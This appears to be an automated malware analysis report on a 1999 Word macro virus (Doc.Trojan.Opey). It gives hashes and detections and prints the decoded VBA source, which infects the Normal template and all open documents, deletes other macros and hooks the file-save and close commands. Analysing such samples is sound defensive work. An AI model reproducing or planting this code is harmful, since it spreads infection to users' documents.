Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 83734df299f439ce…

MALICIOUS

Office (OLE)

52.0 KB Created: 1999-11-08 15:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4b1bbe726f790070a0ddb639bc0e0a8a SHA-1: 31c871b5da07e82c5f88433b2eaa8eacd224821a SHA-256: 83734df299f439ce8b30a9f5248d0bdb8ddcf16edf133ba24f8d7c94c5eba679
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with multiple detections, including 'Doc.Trojan.Opey-18' and 'Doc.Trojan.Opey-6'. It contains VBA macros, specifically an 'AutoOpen' macro, which is a common technique for executing malicious code upon document opening. The extracted VBA script attempts to remove other VBA components from the Normal template and open documents, suggesting a self-preservation or anti-analysis function.

Heuristics 4

  • ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4620 bytes
SHA-256: 7075034f155d02f93544a0465f16884e9b1c6fdee5f1ffd731ca6cece679ba10
Detection
ClamAV: Doc.Trojan.Opey-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FoxChitShareWare"

Sub Immunize()
On Error Resume Next
    
    Call A_OPEY_03
    Dim DocuName$, OpenDocInfected As Boolean
    Dim I%, J%
    
    NmlInfected = False
        
    For I = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        DocuName = NormalTemplate.VBProject.VBComponents(I).Name
        If DocuName = "FoxChitShareWare" Then NmlInfected = True
        If (DocuName <> "FoxChitShareWare") And (DocuName <> "ThisDocument") Then
            Application.OrganizerDelete _
                Source:=NormalTemplate.FullName _
                , Name:=DocuName _
                , Object:=wdOrganizerObjectProjectItems
        End If
    Next I
    
    For Each opendoc In Documents
        OpenDocInfected = False
        With opendoc
            For J = opendoc.VBProject.VBComponents.Count To 1 Step -1
            DocuName = opendoc.VBProject.VBComponents(J).Name
                'If DocuName = "A_OPEY_03" Then OpenDocInfected = True
                'If (DocuName <> "A_OPEY_03") And
                If (DocuName <> "FoxChitShareWare") And _
                  (DocuName <> "ThisDocument") And _
                  (DocuName <> "Reference to Normal") Then
                     Application.OrganizerDelete Source:=opendoc.FullName _
                     , Name:=DocuName _
                     , Object:=wdOrganizerObjectProjectItems
                End If
            Next J
            
            If Not OpenDocInfected Then
                Application.OrganizerCopy Source:=NormalTemplate.FullName, _
                Destination:=opendoc.FullName, _
                Name:="FoxChitShareWare", _
                Object:=wdOrganizerObjectProjectItems
                opendoc.SaveAs FileName:=opendoc.FullName
            End If
        End With
    Next opendoc
    
    If NmlInfected = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
         Destination:=NormalTemplate.FullName, Name:="FoxChitShareWare", _
         Object:=wdOrganizerObjectProjectItems
        NormalTemplate.Save
    End If
    
End Sub
Sub A_OPEY_03()
On Error Resume Next
    
    With Application
        .UserName = "Ulysses R. Gotera"
        .UserAddress = "FoxChit SoftWare Solutions"
        .UserInitials = "IOnlyFinishedHighSchool"
    End With
    
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Ulysses Gotera"
        .Title = "FoxChit Software Solutions"
        .Execute
    End With
    
    With Options
        .ConfirmConversions = True
        .VirusProtection = True
        .SaveNormalPrompt = False
    End With
    
    With ActiveDocument
        .ReadOnlyRecommended = True
    End With
    
    On Error Resume Next
    'CommandBars("Visual Basic").Visible = False
    'CommandBars("Visual Basic").Enabled = False
    'CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    'CommandBars("Visual Basic").Protection = msoBarNoCustomize
    'CommandBars("Tools").Controls("Macro").Delete
    'CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
    'FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    'FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    
End Sub
Sub FileSave()
    On Error Resume Next
    Call Immunize
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call Immunize
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub FileExit()
    On Error Resume Next
    Call Immunize
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub FileNew()
On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    Call Immunize
End Sub
Sub AutoOpen()
On Error Resume N
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.